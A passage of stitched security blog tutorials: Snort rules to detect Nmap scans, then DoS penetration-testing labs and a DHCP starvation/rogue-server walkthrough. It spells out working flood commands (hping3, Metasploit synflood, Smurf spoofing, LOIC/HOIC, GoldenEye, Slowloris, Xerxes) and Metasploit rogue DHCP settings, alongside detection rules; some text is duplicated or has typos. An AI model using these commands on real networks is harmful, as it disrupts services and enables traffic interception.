How to Detect NMAP Scan Using Snort

December 22, 2017, 6:19 am

≫ Next: DOS Penetration Testing (Part 1)

≪ Previous: Understating Guide of Windows Security Polices and Event Viewer

$

0

0

Today we are going to discuss how to Detect NMAP scan using Snort but before moving ahead kindly read our privious both articles releted to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network.

Basically in this article we are testing Snort against NMAP various scan which will help network security analyst to setup snort rule in such a way so that they become aware of any kind of NMAP scanning.

Requirement

Attacker: Kali Linux (NMAP Scan)

Target: Ubuntu (Snort as IDS)

Optional: Wireshark (we have added it in our tutorial so that we can clearly confirm all incoming and outgoing packet of network)

Let’s Begins!!

Identify NMAP Ping Scan

As we know any attacker will start attack by identifying host status by sending ICMP packet using ping scan. Therefore be smart and add a rule in snort which will analyst NMAP Ping scan when someone trying scan your network for identifying live host of network.

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

Now add given below line which will capture the incoming traffic coming on 192.168.1.105(ubuntu IP) network for ICMP protocol.

alert icmp any any -> 192.168.1.105 any (msg: "NMAP ping sweep Scan "; dsize:0;sid:10000004; rev: 1;)

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now using attacking machine execute given below command to identify status of target maching i.e. host is UP or Down.

nmap   -sP 192.168.1.105 --disable-arp-ping

If you will execute above command without parameter “disable arp-ping” then will work as default ping sweep scan which will send arp packets inspite of sending ICMP on targets network and may be snort not able to capture NMAP Ping scan in that sinario, therefore we had use parameter “disable arp-ping” in above command.

As I had declaimed above why we are involving wireshark in this tutorial so that you can clearly see the packet sends form attacker network to targets network. Hence in given below image you can notice ICMP request packet as well as ICMP reply packets both are part of network traffic.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Ping Sweep scan. . Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP TCP Scan

Now in order to connect with target network, attacker may go with networking enumeration either using TCP Protocol or UDP protocol. Let assume attacker may choose TCP scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg: "NMAP TCP Scan"; sid:10000005; rev:2; )

Above rule is only applicable for port 22 so if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for TCP scan on port 22.

nmap -sT -p22 192.168.1.105

From given below image you can observe wireshark has captured TCP packets from 192.168.1.104 to 192.168.1.105

Here you can confirm that our snort is absolutely working when attacker is scanning port 22 using nmap TCP scan and it is showing attacker’s IP from where traffic is coming on port 22. Hence you can block this IP to protect your network from further scanning.

Identify NMAP XMAS Scan

As we know that TCP communication follows three way handshake to established TCP connection with target machine but sometimes instead of using SYN, SYN/ACK,ACK flag attacker choose XMAS scan to connect with target by sending data packets through Fin, PSH & URG flags.

 Let assume attacker may choose XMAS scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:"Nmap XMAS Tree Scan"; flags:FPU; sid:1000006; rev:1;)

Again above rule is only applicable for port 22  which will listen for incoming traffic when packets come from Fin, PSH & URG flags .So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for XMAS scan on port 22.

nmap -sX -p22 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN, PSH, URG flags.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP XMAP scan. . Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP FIN Scan

Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose FIN scan to connect with target by sending data packets through Fin flags only.

 Let assume attacker may choose FIN scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.1045 22 (msg:"Nmap FIN Scan"; flags:F; sid:1000008; rev:1;)

Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from Fin Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for FIN scan on port 22.

nmap -sF -p22 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN flags.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP FIN scan. Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP NULL Scan

Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose NULL scan to connect with target by sending data packets through NONE flags only.

 Let assume attacker may choose FIN scanning for network enumeration then in that situation we can apply following rule in snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:"Nmap NULL Scan"; flags:0; sid:1000009; rev:1;)

Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from NONE Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for NULL scan on port 22.

nmap -sN -p22 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using NONE flags.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Null scan. Hence you can block attacker’s IP to protect your network from further scanning.

Identify NMAP UDP Scan

In order to Identify open UDP port and running services attacker may chose NMAP UDP scan to establish connection with target machine for network enumeration then in that situation we can apply following rule in snort local rule file.

alert UDP any any -> 192.168.1.105 68 (msg:"Nmap UDPScan"; sid:1000010; rev:1;)

Again above rule is only applicable for port 68 which will listen for incoming traffic when packets come from NONE Flags. So if you want to scan any other port then replace 68 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.Identify NMAP UDP Scan

In order to Identify open UDP port and running services attacker may chose NMAP UDP scan to establish connection with target machine for network enumeration then in that situation we can apply following rule in snort local rule file.

alert UDP any any -> 192.168.1.105 68 (msg:"Nmap UDPScan"; sid:1000010; rev:1;)

Again above rule is only applicable for port 68 which will listen for incoming traffic when packets come from NONE Flags. So if you want to scan any other port then replace 68 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above.

Now again using attacker machine execute the given below command for NULL scan on port 22.

nmap -sU -p68 192.168.1.105

From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send over UDP Port.

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP UDP scan. Hence you can block attacker’s IP to protect your network from further scanning.

---

DOS Penetration Testing (Part 1)

December 24, 2017, 10:20 am

≫ Next: DOS Attack Penetration Testing (Part 2)

≪ Previous: How to Detect NMAP Scan Using Snort

$

0

0

Hello friends! Today we are going to describe DOS/DDos attack, here we will cover What is dos attack; How one can lunch Dos attack on any targeted network and What will its outcome and How victim can predict for Dos attack for his network.

Requirement

Attacker machine: kali Linux: 192.168.1.105

Victim machine: ubtuntu (without IDS) 192.168.1.10

Victim machine: ubuntu: 192.168.1.107 (using IDS: Snort)

Optional:Wireshark (we have added it in our tutorial so that we can clearly confirm all incoming and outgoing packet of network)

What is DOS/DDOS ATTACK?

Form Wikipedia

A denial-of-service attack (DoS attack) is a cyber-attack where the attacker looks for to make a machine or network resource unavailable to its deliberated users by temporarily or indefinitely services of disturbing a host connected to the Internet. Denial of service is usually accomplished by flooding the targeted machine or resource with excessive requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.

In a distributed denial-of-service attack (DDoS attack), the incoming traffic flooding the victim originates from many different sources. A DoS or DDoS attack is analogous to a group of people crowding the entry door or gate to a shop or business, and not letting legitimate parties enter into the shop or business, disrupting normal operations.

Basically attacker machine either himself sends infinite request packets on target machine without waiting for reply packet form target network, or uses bots (host machines) to send request packet on target machine. Let study more above it using given below image, here you can observe 3 Phases where Attackermachine is placed at the Top while Middle part holds Host machine which is control by attacker machine and at Bottom you can see Targetmachine.

From given below image you can observe that the attacker machine want to send ICMP echo request packet on target machine with help of bots so this will increase the number of attacker and number of request packet on target network and cause traffic Flood. Now at that time the targeted network get overloaded and hence lead some service down then prevent some or all legitimate requests from being fulfilled.

DOS/DDOS can Majorly Categories into 3 Ways

Volume Based Attack: The attack’s objective is to flood the bandwidth of the target networks by sending ICMP or UDP or TCP traffic in per bits per second.

Protocol Based Attack: This kind of attack focus actual target server resources by sending packets such TCP SYN flood, Ping of death or Fragmented packets attack per second to demolish the target and make it unresponsive to other legitimate requests.

Application Layer Attack: Rather than attempt to demolish the whole server, an attacker will focus their attack on running applications by sending request per second for example attacking on WordPress, Joomla web server by infinite request on apache to make it unresponsive to other legitimate requests.

How to Perform DOS Attack?

If you are aware of OSI 7 layers model then you may know that whenever we send request packet to server for accessing any particular service for example browsing Google.com then this process execute by passing through 7 layers of OSI model and at last we are able to access Google.com on browser.

Now suppose port 80 is open in target’s network (192.168.1.10) for accessing its HTTP services so that you can open their website through your browser and get the information available in those web pages. So basically attacker plan to slow down HTTP service for other user who wants to interact with target machine through port 80 as result server will not able to reply the other legitimate requests and this will consider as Protocol Dos attack.

Attacker can use any tool for DOS attack but we are using Hping3 for attacking to generate traffic flood for target’s network to slow down its HTTP service for other users.

hping3 -F --flood -p 80 192.168.1.10

Above command will send endless request packet per second on port 80 of target’s network.

What will Effect of Dos Attack?

As we had described that any kind of Dos attack will affect the server services to their users and clients in establishing connection with it. Here also when we had sent infinite request packet on port 80 of target’s network then it should make HTTP service unable for legitimate users.

So now if I will explore target IP on your browser for accessing their web site as a legitimate users then you can observe that the browser is unable to connect with server for HTTP services as shown in given below image.

How to predict Dos Attack in Our Network?

Configure IDS in your network which will monitor the incoming network traffic on your network and generates the alert for suspicious traffic to system administrators. We had install Snort on system (ubuntu: 192.168.1.107) as NIDS (Network Intrusion Detection System) kindly read our previous both articles related to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network.

Predict SYN Flood Dos Attack

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

alert tcp any any -> 192.168.1.107 any (msg: “SYN Flood Dos”; flags:S; sid:1000006;)

Above rule will monitor incoming TCP-SYN packets on 192.168.1.107 by generating alert for it as “SYN Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now test the above rule by sending infinite SYN packet using attacker’s machine. Open the terminal and enter msfconsole for metasploit framework and execute given below command to run the syn flood exploit.

This exploit will send countless syn packets on target’s network to demolish its services.

use auxiliary/dos/tcp/synflood

msf auxiliary(synflood) > set rhost 192.168.1.107 (target IP)

msf auxiliary(synflood) > set shost 192.168.1.105 (attacker’s IP )

msf auxiliary(synflood) > exploit

We have set shost for attacker’s IP only for tutorial else it was optional or you can address any random IP of your network, now can see SYN flood has been lunched on port 80 by default it is consider as Protocol Based Dos Attack as described above.

As I had declaimed above why we are involving wireshark in this tutorial so that you can clearly see the packet sends from attacker network to targets network. Hence in given below image you can notice endless SYN packet has sent on target’s network on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “SYN Flood Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

Predict UDP Flood Dos Attack

Now again open local rule files for generating alert for UDP flood Dos attack and enter given below rule and save the file.

alert udp any any -> 192.168.1.107 any (msg: “UDP Flood Dos”; sid:1000001;)

Above rule will monitor incoming UDP packets on 192.168.1.107 by generating alert for it as “UDP Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

We are using Hping3 for attacking to generate traffic flood for target’s network to slow down its UDP service for other users it is consider as Volume Based Dos Attackas described above.

hping3 --UDP –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

From given below image you can observe wireshark has captured UDP packets from 192.168.1.105 to 192.168.1.107

Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for UDP Flood Dos attack. Hence you can block attacker’s IP to protect your network from further scanning.

Predict SYN_FIN Flood Dos Attack

Now again open local rule files for generating alert for some combination of flags such as SYN-FIN packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “SYN-FIN Flood Dos”; sid:1000001; flags:SF;)

Above rule will monitor incoming TCP-SYN/FIN packets on 192.168.1.107 by generating alert for it as “SYN-FIN Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -SF –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless SYN-FIN packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “SYN-FIN Flood Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

Predict PUSH_ACK Flood Dos Attack

Now again open local rule files for generating alert for some combination of flags such as PSH-ACK packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “PUSH-ACK Flood Dos”; sid:1000001; flags:PA;)

Above rule will monitor incoming TCP-PSH/ACK packets on 192.168.1.107 by generating alert for it as “PUSH-ACK Flood Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -PA –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless PSH-ACK packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “PUSH-ACK Flood Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

Predict Reset Flood Dos Attack

Now again open local rule files for generating alert for Reset flag packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “Reset Dos”; sid:1000001; flags:R;)

Above rule will monitor incoming TCP-RST packets on 192.168.1.107 by generating alert for it as “Reset  Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -R –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless RST (Reset) packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “Reset Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

Predict FIN Flood Dos Attack

Now again open local rule files for generating alert for Fin flag packets and enter given below rule and save the file.

alert tcp any any -> 192.168.1.107 any (msg: “FIN Dos”; sid:1000001; flags:F;)

Above rule will monitor incoming TCP-RST packets on 192.168.1.107 by generating alert for it as “FIN Dos”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic flood for target’s network to slow down network services for other users.

hping3 -F –flood -p 80 192.168.1.107

Above command will send endless bits packet per second on port 80 of target’s network.

Hence in given below image you can notice endless FIN (Finished) packet has sent from 192.168.1.105 to 192.168.1.107 on port 80.

Come back to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic here your will observe that it is generating alerts for “FIN Dos”.  Hence you can block attacker’s IP (192.168.1.105) to protect your network from discard all further coming packets toward your network.

Predict Smruf Attack

Smurf attack is DDOS attack in which large numbers of Internet Control Message Protocol packets are used to generate a fake Echo request (icmp type : 8) containing a spoofed source IP which is actually the target network address. This request packet is then is transmitted to all of the network hosts on the network and then each host sends an ICMP response to the spoofed source address (target IP). The target's computer will be flooded with traffic; this can slow down the target's computer and make it unable for other users.

Now again open local rule files for generating alert for ICMP packets and enter given below rule and save the file.

alert icmp any any -> any any (msg: “Smruf Dos Attack”; sid:1000003;itype:8;)

Above rule will monitor ICMP packets on 192.168.1.103 by generating alert for it as “Smurf Dos Attack”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again we are using Hping3 for attacking to generate traffic ICMP flood for target’s network to slow down network services for other users.

hping3 --icmp --flood -c 1000 --spoof 192.168.1.103 192.168.1.255

Above command will generate fake ICMP echo request packet containing a spoofed source IP: 192.168.1.103 which is basically our victim’s network and this request packet is then is transmitted to host’s network on 192.168.1.255 and then this host sends an ICMP response to the spoofed source address which our victim’s machine in IDS mode.

From given below image you can observe it is showing source machine 192.168.1.103 sending  icmp echo request packet to 192.168.1.255 but as we know in actually attacker is main culprit behind this senario.

Come back to over your target machine where you will notice that snort is capturing all the traffic flowing from 192.168.1.103 to 192.168.1.255 and generating alerts for “Smurf Dos Attack” which means is our machine (victim’s machine) is pinging other host machine of that network. Therefore the network administrator should be attentive with this kind of traffic and must check the system activity and legitimate ICMP request of packet of his network.

DOS Attack Penetration Testing (Part 2)

December 26, 2017, 8:18 am

≫ Next: DHCP Penetration Testing

≪ Previous: DOS Penetration Testing (Part 1)

$

0

0

In our previous “DOS Attack Penetration testing” we had described about several scenario of DOS attack and receive alert for Dos attack through snort. DOS can be performed in many ways either using command line tool such as Hping3 or GUI based tool. So today you will learn how to Perform Dos attack using GUI tools as well as command line tool and get an alert through snort.

Let start!!

TCP Flood Attack  using LOIC

As we have discribed in our both article Part 1 and part 2 that in target system Snort is working as NIDS for analysing network traffic packets.  Therefore first we had build a rule for in snort to analysis random TCP packets coming in our network rapiditly.

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

alert TCP any any -> 192.168.1.10 any (msg: “TCP Flood”; sid:1000001;)

Above rule will monitor incoming TCP packets on 192.168.1.10 by generating alert for it as “TCP Flood”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

LOIC: It stands for low Orbit iron cannon which is GUI tool developed by Praetox Technologies which is network stress testing tool. We had used it only for educational purpose in our local network, using it over public sector will consider as crime and take as illegal job.  Download it from Google.  

We had downloaded LOIC in our Windows system run the setup file for installation. Start the tool follow the given below step:

Select your target: Here we will go with IP option and enter the victims IP: 192.168.1.10 then click on Lock on tab.

Attack Option:Enter port no. and select method such as TCP and enter no. of threads. If you want to wait for reply packet from victim’s network then enable the check box else disable it.

Adjust the scale:  Drawn the cursor left or right for setting the speed of your TCP packet either faster or slower mode.

Attack status:describe the attack state such as connecting or request or etc.

Ready:  Now click on IMMA CHARGIN MAH LAZER to launch the DOS attack and click on stop flood In order to stop DOS attack.

We are involving wireshark in this tutorial so that you can clearly see the packet sends from attacker network to targets network. Hence in given below image you can notice endless TCP packet has been sent on target’s network. It is considered as Volume Based DOS Attack which floods the target network by sending infinite packets to demolish its network for other legitimate users.

Return to over your target machine where you will notice that snort is exactly in same way capturing all in coming traffic, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.16) to protect your network from discard all further coming packets toward your network.

UDP Flood Attack  using LOIC

I think now everything is clear to you how you can build rule in snort get alert for suspicious network again repeat the same and  execute given below command in ubuntu’s terminal to open snort local rule file in text editor and add rule for UDP flood.

sudo gedit /etc/snort/rules/local.rules

alert UDP any any -> 192.168.1.10 any (msg: “UDP Flood”; sid:1000003;)

Above rule will monitor incoming UDP packets on 192.168.1.10 by generating alert for it as “UDP Flood”. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Repeat the whole steps as done above only change the method attack option choose UDP method and launch the DOS attack on target IP. You can set any set number of threads for attack since it is tutorial therefore I had set 20 for UDP. It is considered as Volume Based DOS Attack which floods the target network by sending infinite packets to demolish its network for other legitimate users.

Return to over your target machine where you will observe that snort is precisely capturing all in coming traffic in same way, here you will observe that it is generating alerts for “UDP Flood”.  Hence again you can block attacker’s IP (192.168.1.16) to protect your network from discard all further coming packets toward your network on port 80.

TCP Flood Attack  using HOIC

Next we are using HOIC which is alos GUI tool for tcp attack and if you remember we ahd already configure TCP flood rule in our local rule file. Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

HOIC: It stands for higher orbit ion cannon developed by Praetox Technologies which is network stress testing tool. We had used it only for educational purpose in our local network, using it over public sector will consider as crime and take as illegal job. Download it from Google.

We had downloaded HOIC in our Windows system run the setup file for installation. Start the tool follow the given below step:

Add the target by making Click on plus symbol “+”

A list of attack option will get pop up as shown in given below image and follow the given below step:

 URL: Enter your target network address as http://192.168.1.10

Power: Low/medium/high to decide the speed of packet to bent to target machine.

At last click on Add.

From give below image you can check status of attack “ready”, now set number of threads and then click on FIRE THE LAZER tab to lunch the dos attack.

You can clearly observe the TCP packet is sending from attacker network to targets network. In given below image you can notice the endless TCP packet has been sent on target’s network using TCP Flags such as SYN/RST/ACK. It is considered as Volume Based DOS Attack which floods the target network by sending infinite packets to demolish its network for other legitimate users.

Return to over your target machine where you will notice that snort is capturing all in coming traffic exactly in same way as above, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.11) to protect your network from discard all further coming packets toward your network on port 80.

GoldenEye

Goldeneye is command line tool use for security testing purpose we had used only for tutorial don’t use it over public sector it will consider as crime and take as illegal job. Execute given below in your kali Linux to download it from github.

git clone https://github.com/jseidl/GoldenEye.git

Now give all permission to the python script and execute given below command for Launching DOS attack on target network. Basically goldeneye is used for HTTP dos testing for testing any webserver network security.

 ./goldeneye.py http://192.168.1.10

Using wireshark you can observe the flow of traffic between victim and attacker network. So if notices given below image then you will find that first attacker (192.168.1.103) sends TCP syn packet for establishing connection with victim’s network then attacker is sending http packet over victim’s network.

Here you will observe that it is generating alerts for “TCP Flood” since port is 80 follow TCP protocol therefore snort captured the traffic generated by goldeneyes. Hence you can block attacker’s IP (192.168.1.103) to protect your network from discard all further coming packets toward your network on port 80.

Slowloris

Slowloris is command line tool use for security testing purpose we had used only for tutorial don’t use it over public sector it will consider as crime and take as illegal job. Execute given below in your kali Linux to download it from github.

git clone https://github.com/llaera/slowloris.pl.git

Now give all permission to the perl script and execute given below command for Launching DOS attack on target network.

perl slowloris.pl -dns 192.1681.10

Using wireshark you can observe the flow of traffic between victim and attacker network. So if notices given below image then you will find that first attacker (192.168.1.103) sends TCP syn packet for establishing connection with victim’s network then victim’s is sending SYN,ACK packet over attacker’s network and then attacker sends ACK packet and this will keep on looping.

Return to over your target machine where you will notice that snort is capturing all in coming traffic exactly in same way as above, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.11) to protect your network from discard all further coming packets toward your network on port 80.

Xerxes

Xerxer is command line tool use for security testing purpose we had used only for tutorial don’t use it over public sector it will consider as crime and take as illegal job. Execute given below in your kali Linux to download it from github.

git clone https://github.com/zanyarjamal/xerxes.git

Since it is written in c language there we need to compile it using gcc as shown in given below command and run then run the script in order to launch DOS attack.

gcc xerxes.c -o xerxes

./xerxes 192.168.1.10 80

You can clearly observe the TCP packet is sending from attacker network to targets network. In given below image you can notice the endless TCP packet has been sent on target’s network using TCP Flags such as SYN/ACK/PSH. These packet are sent in a loop between attacker can target network.

Return to over your target machine where you will notice that snort is capturing all in coming traffic exactly in same way as above, here you will observe that it is generating alerts for “TCP Flood”.  Hence you can block attacker’s IP (192.168.1.11) to protect your network from discard all further coming packets toward your network on port 80.

Well in this tutorial we had use most powerful top 5 tool for DOS attack.

DHCP Penetration Testing

December 29, 2017, 8:24 am

≫ Next: Packet Crafting with Colasoft Packet Builder

≪ Previous: DOS Attack Penetration Testing (Part 2)

$

0

0

DHCP stands for Dynamic Host Configuration Protocol and a DHCP server dynamically assigns an IP address to enable hosts (DHCP Clients). Basically DHCP server reduce the manually effort of administer of configuring IP address in client machine by assign a valid IP automatically to each network devices. A DHCP is available for distributing IP address of any Class among: A B C D E basis on their netmask description which means it is applicable even for small network or a huge network.

DHCP uses UDP as its transport protocol. The client sends messages to the server on port 67 and the server sends messages to the client on port 68.

There are three mechanisms used to assign an IP address to the client. They are:

·         Automatic allocation - DHCP assigns a permanent IP address to a client

·         Manual allocation - Client's IP address is assigned by the administrator, DHCP conveys the address to the client.

·         Dynamic allocation- DHCP assigns an IP address to the client for a limited period of time (lease).

Mode of Operation DHCP server and DHCP Client

·         DHCP Discover: DHCP client broadcast a DHCP discover message to DHCP server for an IP address lease request through subnet mask for e.g. 255.255.255.255.

·         DHCP Offer: DHCP serverreceives DHCP Discover message for an IP address lease form DHCP client and reserve IP for it and send DHCP OFFER message to DHCP Client for IP lease.   

·         DHCP Request: DHCP clientbroadcast a message to DHCP server for acceptance of IP by receiving Offered IP packets and make DHCP request for IP parameter configuration.

·         DHCP Acknowledgment: DHCP server receivesDHCP client request for IP configuration process and as responds DHCPACK message sent to client with committed IP address and its configuration and with some additional information such lease time of offered IP.

·         DHCP Release:  DHCP client sends a DHCP Release packet to the DHCP server to release the IP address.

DHCP Starvation Attack

A DHCP starvation attack may also categories as DHCP DOS attack where the attacker broadcasting fake DHCP requests with spoofed MAC addresses. If official replies to this fake request then it can exhaust the address space available to the DHCP servers for a period of time. This can be performed by using attacking tools such as “Yersinia”.

Now attacker may place rouge server in the network and respond to new DHCP requests from clients.

Form given below image you can observe that by executing given command we discovered bind hardware with our official router. Here we had used CISCO router for DHCP penetration testing.

ip  dhcp binding

Launch DHCP Starvation Attack using Yersinia

Yersinia is a network tool designed to take advantage of some weakness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.

Currently yersinia supports:

Spanning Tree Protocol (STP)

Cisco Discovery Protocol (CDP)

Dynamic Trunking Protocol (DTP)

Dynamic Host Configuration Protocol (DHCP)

Hot Standby Router Protocol (HSRP)

IEEE 802.1Q

IEEE 802.1X

Inter-Switch Link Protocol (ISL)

VLAN Trunking Protocol (VTP)

From http://www.yersinia.net/

By default in Kali Linux installed yersinia is available for DHcp penetration testing, open the terminal and execute given command which will open yersinia in GUI mode as shown in given below image.

yersinia -G

You will observe few tabs in menu bar click on launch attack; a small window will pop up for choosing protocol for attack  here we had select DHCP, now enable the option for sending  DISCOVER packet.

Now it will start sending Discovered packet to the router for release IP for each of its fake Discover message as shown in given image.

From given below image you can observe wireshark has capture the DHCP packet where the attacker machine as source 0.0.0.0 is broadcasting DISCOVER message to Destination on 255.255.255.255. This is DHCP starvation attack which also considered as DHCP Dos attack because its send Discover message infinitely in network to block the responded server for other genuine request from other DHCP client.

Now when again you will check our router IP table then you will observe that all IP is allocated on some different-different Hardware address as shown in given below image.

Rogue DHCP Server

A rough DHCP server is a forged server of attacker which is place in a local network for stealing information that is being shared among several clients. After DHCP starvation attack, the official DHCP server is unable to Offer IP to DHCP client. Therefore when a client release its old IP and request new IP by broadcasting DHCP Discover message then rough server offer an IP as responds to the DHCP client and hence Client request for IP configuration from fake server and get trap into fake network. Now if client is transferring any information over fake network that can easily sniff by rough server. 

Form given below image you check attacker’s machine IP is 192.168.1.104 which will reflect as DNS address in victim’s machine (Windows’s).

Now open the terminal and type “msfconsole” for metasploit framework and execute given below commands which will create your Rouge server in the network.

use auxiliary/server/dhcp

msf auxiliary(dhcp) > set srvhost 192.168.104

msf auxiliary(dhcp) >set netmask 255.255.255.0

msf auxiliary(dhcp) >set DHCPIPSTART 192.168.1.200

msf auxiliary(dhcp) >set DHCPIPEND 192.168.1.205

msf auxiliary(dhcp) >Exploit

If you perceive above command then you will find that it will Start DHCP service and behave like a DHCP server which will offer Class C IP to official DHCP client form specified pool between 192.168.1.200 to 192.168.1.205.

Now turn on any another system in network and check its IP configuration.

Let’s study the given image where attack is broadcasting Offer packet in the network and then in 2^ndpacket we saw DHCP ACK which means some DHCP client ask for offered IP configuration then we can see DNS query send from an IP 192.168.1.202 to 192.168.1.104.

Form given below image you can observed that 192.168.1.202 IP is allocated to ubuntu which is official DHCP client. Now if client is transferring any information over fake network that can easily sniff by rough server.  For detail read our previous article “Comprehensive guide on sniffing”

Packet Crafting with Colasoft Packet Builder

December 30, 2017, 11:12 pm

≫ Next: DOS Attack with Packet Crafting using Colasoft

≪ Previous: DHCP Penetration Testing

$

0

0

In this tutorial we are going to discuss Packet Crafting by using a great tool Colasoft packet builder which is quite useful in testing strength of Firewall and IDS and several servers against malicious Flood of network traffic such as TCP and UDP Dos attack. This tool is very easy to use especially for beginners.

Packet crafting is a technique that allows network administrators to probe firewall rule-sets and find entry points into a targeted system or network. This is done by manually generating packets to test network devices and behavior, instead of using existing network traffic. Testing may target the firewall, IDS, TCP/IP stack, router or any other component of the network. Packets are usually created by using a packet generator or packet analyzer which allows for specific options and flags to be set on the created packets. The act of packet crafting can be broken into four stages: Packet Assembly, Packet Editing, Packet Play and Packet Decoding.

For more detail visit Wikipedia.org

Mode of Operation

Packet Assembly: It is the initial state of packet crafting where tester needs to decide the network that can be compromise easily by creating a packet which can exploit the network by shooting its vulnerability. The packet should be design in a manner that it maintains its ability to being undetectable in target’s network.

Famous Tools for Packet Assembly are: Hping3 and Yersinia   

Packet Editing: In this stage captured packet is edited or modified which cannot be possible to do in Packet Assembly phase. In this phase packet is edited in a manner that it can dump more and more information of target’s network by making small amount of change in it. For example change data length (payload) of packets.

Famous Tool of packet Editing: Colasoft and Scapy   

